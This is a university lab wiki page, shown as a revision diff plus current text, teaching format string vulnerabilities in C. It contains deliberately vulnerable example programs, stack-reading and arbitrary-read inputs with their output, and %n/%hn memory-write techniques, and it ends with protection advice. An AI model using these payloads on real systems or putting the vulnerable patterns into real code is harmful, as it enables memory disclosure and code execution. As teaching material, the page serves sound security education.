Difference between revisions of "Format String Bug Introduction"

From Embedded Lab Vienna for IoT & Security
Jump to navigation Jump to search
Line 25: Line 25:
The '''Format Parameter/Specifier''' <code>%d,%s,%p,%u,..</code> defines the type of conversion function.
The '''Format Parameter/Specifier''' <code>%d,%s,%p,%u,..</code> defines the type of conversion function.


=== Format Parameter/Specifier Table ===
==== Format Parameter/Specifier Table ====
{| class="wikitable"
{| class="wikitable"
|-
|-
Line 49: Line 49:
In vulnerable code the user input is directly passed to the function <code>printf(userinput)</code> instead of a Format String including Format Parameter.
In vulnerable code the user input is directly passed to the function <code>printf(userinput)</code> instead of a Format String including Format Parameter.


=== Vulnerable Format Functions Table ===
==== Vulnerable Format Functions Table ====
{|class="wikitable"
{|class="wikitable"
|-
|-
Line 72: Line 72:
|}
|}


=== History ===
==== History ====
The Format String Bug is publicly known since at least September 1999<ref name="proftpd" />, it has obtained major attention after public release of the exploit code anainst wu-ftpd 2.6.0 in June 2000<ref name="wuftpd" />.
The Format String Bug is publicly known since at least September 1999<ref name="proftpd" />, it has obtained major attention after public release of the exploit code anainst wu-ftpd 2.6.0 in June 2000<ref name="wuftpd" />.


=== Example - Read from the stack ===
===Read From the Stack===
==== Example - Read from the stack ====
Shows safe and vulnerable usage of Format Function
Shows safe and vulnerable usage of Format Function


Line 98: Line 99:
The Format Function interprets the passed command line arguments as formatted string with 15 pointer arguments. As a further specification is missing it will print the next 15 pointer from the stack, which means we are able to dump the stack.
The Format Function interprets the passed command line arguments as formatted string with 15 pointer arguments. As a further specification is missing it will print the next 15 pointer from the stack, which means we are able to dump the stack.


=== What happens exactly? ===
==== What happens exactly? ====


* '''Stack with correctly coded Format String'''
* '''Stack with correctly coded Format String'''
<code>printf(“this is a %s, with a number %d, and address %08x”,a,b,&c);</code>
<code>printf(“this is a %s, with a number %d, and address %08x”,a,b,&c);</code>
The stack grows to the lower addresses and is used in a LIFO manner, the arguments are pushed in reverse order on the stack. The Format Function will pop a, b, c variables and convert them into the string which is sent to stdout.
The stack grows to the lower addresses and is used in a LIFO manner, the arguments are pushed in reverse order on the stack. The Format Function will pop a, b, c variables and convert them into the string which is sent to stdout.(Source of image: <ref name="exptut" />)


[[File:Safe.png|alt={Source:<ref name="exptut" />}]]
[[File:Safe.png]]


* '''Stack with missing variables'''
* '''Stack with missing variables'''
<code>printf(userinput)</code> with an input string <code>“this is a %s, with a number %d, and address %08x”</code> evaluates to
<code>printf(userinput)</code> with an input string <code>“this is a %s, with a number %d, and address %08x”</code> evaluates to
<code>printf(“this is a %s, with a number %d, and address %08x”);</code>
<code>printf(“this is a %s, with a number %d, and address %08x”);</code>
The variables a,b,&c are missing on the stack.
The variables a,b,&c are missing on the stack.(Source of image: <ref name="exptut" />)


[[File:Vulnstack.png|alt={Source: <ref name="exptut" />}]]
[[File:Vulnstack.png]]


The Format Function pops the next values from the stack even when they have not been declared.
The Format Function pops the next values from the stack even when they have not been declared.
If the source code is available a Format String vulnerability can be recognized by checking all Format Functions, if the string including Format Specifier are correctly provided. In case of a binary test by simply inserting Format Specifiers <code>"%x %x %s"</code> as input.
If the source code is available a Format String vulnerability can be recognized by checking all Format Functions, if the string including Format Specifier are correctly provided. In case of a binary test by simply inserting Format Specifiers <code>"%x %x %s"</code> as input.


=== Arbitrary Read ===
==== Read by Direct Stack Parameter Access ====


File example2.c
File example2.c
<code>
# include  <stdio.h>
# include <string.h>


    # include  <stdio.h>
    # include <string.h>
   
    void vuln() {
        printf("What's your name? ");
        char name[200];
        gets(name);
        printf("Nice to meet you, ");
        printf(strcat(name, "!\n"));
    }


void vuln() {
    void main(int argc, char **argv)
printf("What's your name? ");
    {
char name[200];
        setvbuf(stdin, NULL, _IONBF, 0);
gets(name);
        setvbuf(stdout, NULL, _IONBF, 0);
printf("Nice to meet you, ");
        vuln();
printf(strcat(name, "!\n"));
    }
 
}
 
void main(int argc, char **argv)
{
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
vuln();


}
</code>
We can read arbitrary from the stack by <code>"%<some number>$x"</code>, so to read the first argument on the stack we use <code>%1$08x</code> for the second <code>%2$08x</code>...
We can read arbitrary from the stack by <code>"%<some number>$x"</code>, so to read the first argument on the stack we use <code>%1$08x</code> for the second <code>%2$08x</code>...
To get an idea where we are reading, we can use a method of inserting
To get an idea where we are reading, we can use a method of inserting


<code>
    "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"
"AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"
    ./example2
    What's your name? AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
    Nice to meet you, 
    AAAA.5655f000.00000001.5655d64d.ffd4fbb8.f77595f0.f75bf00b.41414141.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78!


./example2
What's your name? AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
Nice to meet you, AAAA.5655f000.00000001.5655d64d.ffd4fbb8.f77595f0.f75bf00b.41414141.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78!
</code>
then we are able to determine the number of the input buffer on the stack where <code>41414141</code> is found. So the input buffer name is the 6th argument on the stack, which can be accessed by <code>AAAA.%6$08x</code>
then we are able to determine the number of the input buffer on the stack where <code>41414141</code> is found. So the input buffer name is the 6th argument on the stack, which can be accessed by <code>AAAA.%6$08x</code>
**Caution** - data on the stack is represented in little Endian on Unix machines. Test this by inserting
'''Caution''' - data on the stack is represented in little Endian on Unix machines. Test this by inserting
<code>
 
ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
    ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
   
    ./example2
    What's your name? ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
    Nice to meet you, ABCD.f18281a0.0000004f.ffffffaf.85571440.00000012.44434241.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838!


./example2
The Format string with our input <code>ABCD...</code> can be found at the stack beginning with the 6th argument <code>44434241</code> in little Endian and can verified by <code>ABCD.%6$08x</code>.
What's your name? ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
Nice to meet you, ABCD.f18281a0.0000004f.ffffffaf.85571440.00000012.44434241.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838!
</code>
The Format string with our input `ABCD...` can be found at the stack beginning with the 6th argument `44434241` in little Endian and can verified by `ABCD.%6$08x`.


### Arbitrary Read
==== Arbitrary Read ====
We like to read data in memory from an known address. The examples before showed the content of the Format String on the stack is controlled by us.
We like to read data in memory from an known address. The examples before showed the content of the Format String on the stack is controlled by us.
Then we need a Format Parameter which uses an address from the stack (per reference) and displays the memory from there `%s`.
Then we need a Format Parameter which uses an address from the stack (per reference) and displays the memory from there <code>%s</code>.
Now we insert the address which we like to read and define that the 6th item on the stack should be read as string at the pointer address passed by reference with `%s`.
Now we insert the address which we like to read and define that the 6th item on the stack should be read as string at the pointer address passed by reference with <code>%s</code>.
```C
 
address = 0x08480110
    address = 0x08480110
address (encoded as 32 bit le string): "\x10\x01\x48\x08"
    address (encoded as 32 bit le string): "\x10\x01\x48\x08"
printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");
    printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");
```
 


### Test your skills with CH0_easyprintf
(With this information you should be able to solve CH0_easyprintf)


### Write the Stack %n
===Write the Stack %n===


The `%n` Format Parameter writes the number of bytes already printed into a variable. The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack.
The `%n` Format Parameter writes the number of bytes already printed into a variable. The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack.

Revision as of 12:48, 19 May 2020

Summary

This document gives an introduction into format string bugs. The Format String Bug occurs when the programmer passes user controlled buffer to the Format Function. Then user input data is evaluated as a command by the application. An exploit can read from the stack and perform arbitrary write on the stack and therefore change the program behavior. This can lead to program crashes (segmentation faults) and security compromise such as reveal of secrets in memory (information disclosure) or execute arbitrary commands.


Requirements

Binaries are tested on platform: Debian 4.9.210-1 (2020-01-20)

 git clone https://git.fh-campuswien.ac.at/CampusCyberSecurityTeam/ccst
 cd ccst/format_string

All here discussed code examples can be found in the example folder. They are compiled in 32 bit architecture x86 using gcc version 6.3.0 (posix).

 gcc example -m32 -o example

Exploits for x64 architecture may differ

Description of Format String Vulnerability

The Bold textFormat function in ANSI C conversion function such as `printf`, which converts a variable into a human-readable string representation. The Format String is the argument of the Format Function, it contains an ASCII string with text and Format Parameter, such as:

 printf (“Guess solution: %d\n”, 42);

Here 42 is interpreted as a decimal number by the Format Function. The Format Parameter/Specifier %d,%s,%p,%u,.. defines the type of conversion function.

Format Parameter/Specifier Table

Parameters Output Passed as
%p External representation of a pointer to void Reference
%d Decimal Value
%c Character Value
%u Unsigned decimal Value
%x Hexadecimal Value
%s String Reference
%n Writes the number of characters into a pointer Reference

In vulnerable code the user input is directly passed to the function printf(userinput) instead of a Format String including Format Parameter.

Vulnerable Format Functions Table

Format function Description
fprint Writes the printf to a file
printf Output a formatted string
sprintf Prints into a string
snprintf Prints into a string checking the length
vfprintf Prints the a va_arg structure to a file
vprintf Prints the va_arg structure to stdout
vsprintf Prints the va_arg to a string
vsnprintf Prints the va_arg to a string checking the length

History

The Format String Bug is publicly known since at least September 1999[1], it has obtained major attention after public release of the exploit code anainst wu-ftpd 2.6.0 in June 2000[2].

Read From the Stack

Example - Read from the stack

Shows safe and vulnerable usage of Format Function


   #include  <stdio.h>
   void main(int argc, char **argv)
   {
       // This line is safe
       printf("%s\n", argv[1]);
   
       // This line is vulnerable
       printf(argv[1]);
   }


Execute with different arguments:

   ./example "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"
   ./example "%08x.%08x.%08x.%08x.%08x%08x.%08x.%08x.%08x.%08x"
   ./example "%s"

The Format Function interprets the passed command line arguments as formatted string with 15 pointer arguments. As a further specification is missing it will print the next 15 pointer from the stack, which means we are able to dump the stack.

What happens exactly?

  • Stack with correctly coded Format String

printf(“this is a %s, with a number %d, and address %08x”,a,b,&c); The stack grows to the lower addresses and is used in a LIFO manner, the arguments are pushed in reverse order on the stack. The Format Function will pop a, b, c variables and convert them into the string which is sent to stdout.(Source of image: [3])

Safe.png

  • Stack with missing variables

printf(userinput) with an input string “this is a %s, with a number %d, and address %08x” evaluates to printf(“this is a %s, with a number %d, and address %08x”); The variables a,b,&c are missing on the stack.(Source of image: [3])

Vulnstack.png

The Format Function pops the next values from the stack even when they have not been declared. If the source code is available a Format String vulnerability can be recognized by checking all Format Functions, if the string including Format Specifier are correctly provided. In case of a binary test by simply inserting Format Specifiers "%x %x %s" as input.

Read by Direct Stack Parameter Access

File example2.c

   # include  <stdio.h>
   # include <string.h>
   
   void vuln() {
       printf("What's your name? ");
       char name[200];
       gets(name);
       printf("Nice to meet you, ");
       printf(strcat(name, "!\n"));
   }
   void main(int argc, char **argv)
   {
       setvbuf(stdin, NULL, _IONBF, 0);
       setvbuf(stdout, NULL, _IONBF, 0);
       vuln();
   }

We can read arbitrary from the stack by "%<some number>$x", so to read the first argument on the stack we use %1$08x for the second %2$08x... To get an idea where we are reading, we can use a method of inserting

   "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x"
   ./example2
   What's your name? AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
   Nice to meet you,   
   AAAA.5655f000.00000001.5655d64d.ffd4fbb8.f77595f0.f75bf00b.41414141.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78!

then we are able to determine the number of the input buffer on the stack where 41414141 is found. So the input buffer name is the 6th argument on the stack, which can be accessed by AAAA.%6$08x Caution - data on the stack is represented in little Endian on Unix machines. Test this by inserting

   ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
   
   ./example2
   What's your name? ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
   Nice to meet you, ABCD.f18281a0.0000004f.ffffffaf.85571440.00000012.44434241.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838!

The Format string with our input ABCD... can be found at the stack beginning with the 6th argument 44434241 in little Endian and can verified by ABCD.%6$08x.

Arbitrary Read

We like to read data in memory from an known address. The examples before showed the content of the Format String on the stack is controlled by us. Then we need a Format Parameter which uses an address from the stack (per reference) and displays the memory from there %s. Now we insert the address which we like to read and define that the 6th item on the stack should be read as string at the pointer address passed by reference with %s.

   address = 0x08480110
   address (encoded as 32 bit le string): "\x10\x01\x48\x08"
   printf ("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");


(With this information you should be able to solve CH0_easyprintf)

Write the Stack %n

The `%n` Format Parameter writes the number of bytes already printed into a variable. The address of the variable is given to the format function by placing an integer pointer as parameter onto the stack. File: example3 ```C int n_chars = 0; printf("Hello, World%n is ", &n_chars); printf("%d bytes long.\n",n_chars); ``` In the first printf call with %n Format Parameter in example3 the number of 12 bytes of `Hello, World` are written into the variable `n_chars`.

`%n` can be used to write into an specified address ```bash \xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n" ```

The next printf calls show how the value of n_chars can be controlled by inserting a number of bytes for alignment. ```C n_chars = 0; printf("%10u%n ", 1, &n_chars); //n_chars=10 n_chars = 0; printf("%150u%n ", 2, &n_chars); //n_chars=150 ``` But addresses in memory are at least 4 bytes long and we do not like to overwrite these areas on the stack. Therefore techniques to write just a byte are used several times. Let us have a closer look what is happening, because writing just one byte may have some side effects. An unsigned integer in memory is stored in 4 bytes in Little Endian encoding, therefore a number like 0x0000014c is \x4c\x01\x00\x00 in memory. File: example4 ```C unsigned char canary[5]; unsigned char foo[4]; memset (foo, "\x00", sizeof (foo)); /* 0 * before */ strcpy (canary, "AAAA"); /* 1 */ printf ("%16u%n", 7350, (int *) &foo[0]); //foo[0]=0x10 /* 2 */ printf ("%32u%n", 7350, (int *) &foo[1]); //foo[1]=0x20 /* 3 */ printf ("%64u%n", 7350, (int *) &foo[2]); //foo[3]=0x40 /* 4 */ printf ("%128u%n", 7350, (int *) &foo[3]); //foo[3]=0x80 /* 5 * after */ printf ("%02x%02x%02x%02x\n", foo[0], foo[1], foo[2], foo[3]); printf ("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]); ``` In step 0 foo is initialized with 4 times `\x00` bytes and in the next variable on the stack a canary is stored with 'AAAA' presented by `\x41\x41\x41\x41`. After the execution of the 4 steps bytewise write operation foo contains 10204080 as expected, but 3 bytes of the canary got overwritten `\x00\x00\x00\x41`= 00000041.. Figure 1 illustrates the behavior of the write procedures.

Source:[4]

Multiple byte writes at once can also be performed, when the written bytes are ordered. File: example4 ```C strcpy (canary, "AAAA"); printf ("%16u%n%16u%n%32u%n%64u%n", 1, (int *) &foo[0], 1, (int *) &foo[1], 1, (int *) &foo[2], 1, (int *) &foo[3]); printf ("%02x%02x%02x%02x\n", foo[0], foo[1], foo[2], foo[3]); printf ("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]); ``` Output again foo: 10204080 and canary: 00000041.

      1. Write Short %hn

Instead of writing each byte we can use a technique to write short integers using `%hn` format specifier. The advantage of using `%hn` is that it does not destroy data near the targeted address. Therefore this is the preferred method. Again we like to write 10204080 into foo. First value of alignment: 0x2040=8208 Second value of alignment: 0x8040-0x2040=32832-8208=24624

example5 ``` printf ("%.8208u%hn%.24624u%hn", 1, (short int *) &foo[0], 1, (short int *) &foo[2]); ``` Output: foo: 10204080 canary: 41414141


      1. Test your skills with CH1_root_me2


      1. Usage
  • Reading arbitrary locations (leak addresses or canaries)
  • Writing arbitrary locations
  • Executing arbitrary code (Overwrite Return, .GOT addresses)


    1. Protection
  • Programmer should use safe versions

Never pass user input directly to Format Function without format specifier. ``` prinftf("%s",userinputbuffer) snprintf(buf, sizeof buf, "%s", userinputbuffer); ```

  • FormatGuard: Automatic Protection From printf Format String Vulnerabilities [3]


Sources

    1. Interesting CTF writeups

References

  1. Tymm Twillman,Exploit for proftpd 1.2.0pre6, BugTraq, 20-09-1999, https://seclists.org/bugtraq/1999/Sep/328 [accessed 05-21-2020].
  2. tf8, WuFTPD: Providing *remote* root since at least 1994, BugTraq, 22-06-2000, https://seclists.org/bugtraq/2000/Jun/297 [accessed 05-21-2020].
  3. 3.0 3.1 Saif El Sherei, Format String Exploitation-Tutorial, https://www.exploit-db.com/docs/english/28476-linux-format-string-exploitation.pdf[accessed 05-21-2020].
  4. scut / team teso, Exploiting Format String Vulnerabilities, version 1.2,09-01-b2001, http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%20Format%20Bugs%20-%20Exploiting%20format%20string.pdf[accessed 05-21-2020]

Cite error: <ref> tag with name "sins" defined in <references> is not used in prior text.
Cite error: <ref> tag with name "formatguard" defined in <references> is not used in prior text.